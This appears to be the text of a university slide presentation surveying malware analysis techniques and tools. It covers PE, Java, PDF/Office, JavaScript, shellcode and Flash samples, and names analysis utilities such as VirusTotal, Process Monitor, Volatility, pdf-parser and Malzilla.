Matthew Stephen csg.utdallas.edu
Portable Executables (PEs) Java Apps/Applets Documents (PDF, DOC, etc) JavaScript Shellcode Flash (SWF)
Executables, object code, and DLLs Used in 32- and 64-bit Windows OS Several headers and sections.text,.data,.reloc, etc. Many file extensions.exe,.dll,.sys,.scr,.cpl,.ocx,.drv
Check against AV signatures VirusTotal.com Can upload file or search by hash Determine packing (if any) PEiD Detects several types of packing UPX One of the most common packers Strings/Look at Resources (Resource Hacker) Readable strings within a binary Program icons, menu bars, dialog windows, etc.
VirusTotal results
PE Viewers display header and section info PEview, PEBrowse, PE Explorer, PEframe, CFF Explorer Dependencies modules/libraries Dependency Walker shows which functions are actually being used from external modules
Registry view changes made in the Registry Regshot compare Registry snapshots Autoruns view startup applications Process PMDump, ProcDump create a dump for an active process Process Monitor shows file system, Registry, and process activity Process Explorer, Process Hacker shows trees of running processes
Registry changes recorded from RegShot
Process Monitor captures network, file, and Registry activity
Network Madiant ApateDNS control DNS responses WireShark capture/browse network traffic McAfee Attacker TCP/UDP port listener FakeNet simulates a network, fakes files CurrPorts lists open ports and processes TCPview Shows newly opened/closed endpoints SmartSniff, SocketSniff, Network Monitor, SuperScan, NetworkMiner, etc.
FakeNet captures network traffic
Memory Mandiant Memoryze create and analyze memory images Volatility shows open network sockets and connections, open files for each process, DLLs loaded for each process, etc. CaptureBAT behavioral analysis tool that monitors file, Registry, network, and process activity
CaptureBAT detects activity
Desktop Applications and Applets File extensions.jar,.class
Mostly the same as PE file analysis Differences: Obfuscation string building, bad variable names Decompilation JAD, JD-GUI
Both s and t are set to os.name
Differences with PE analysis: Process is java.exe or javaw.exe rather than something like SomeProgram.exe Use jps and jconsole to differentiate multiple java processes
Adobe files.pdf Microsoft files.doc,.ppt, etc. Embedded files or code
pdfid.py identify tags contained in file pdf-parser.py - can extract embedded objects Pyew.py search URLs, shellcode, etc swf_mastah.py flash file extraction JSunpack pdf.py JavaScript detection Peepdf.py encryption detection PDF Stream Dumper checks for known vulnerabilities
Using Pyew.py
OfficeMalScanner Scan for malicious traces (shellcode heuristics, PE files, or embedded OLE streams) Bruteforce detects encrypted files OffVis only looks for patched vulnerabilities pyolescanner.py Looks for shellcode, embedded executables, and API precence Can use bruteforce
Used in most web pages.js file extension if externally referenced Can be embedded in PDF documents
Deobfuscate - replace hexadecimal and escaped characters to a readable format Beautification insert white space Evaluate the evil eval() function
Malzilla Attempts to decode/deobfuscate and evaluate eval() calls without running code JSunpack JSBeautifier
Beautified JavaScript
Shellcode2exe embeds given shellcode into an executable file ConvertShellcode disassembles shellcode into x86 code
Used on most web pages.swf file extension Can be embedded in PDF files
Flare extract scripts from SWF file RABCDAsm (Robust ActionScript ByteCode Disassembler) extract and disassemble scripts SWFDump extract images, fonts, sounds, etc SWFStrings scans SWF for text data
http://practicalmalwareanalysis.com/ http://zeltser.com/ http://isc.sans.edu/ Many Free Tools: Mandiant.com McAfee.com Sysinternals.com NirSoft.net Also check out the tools listed in presentation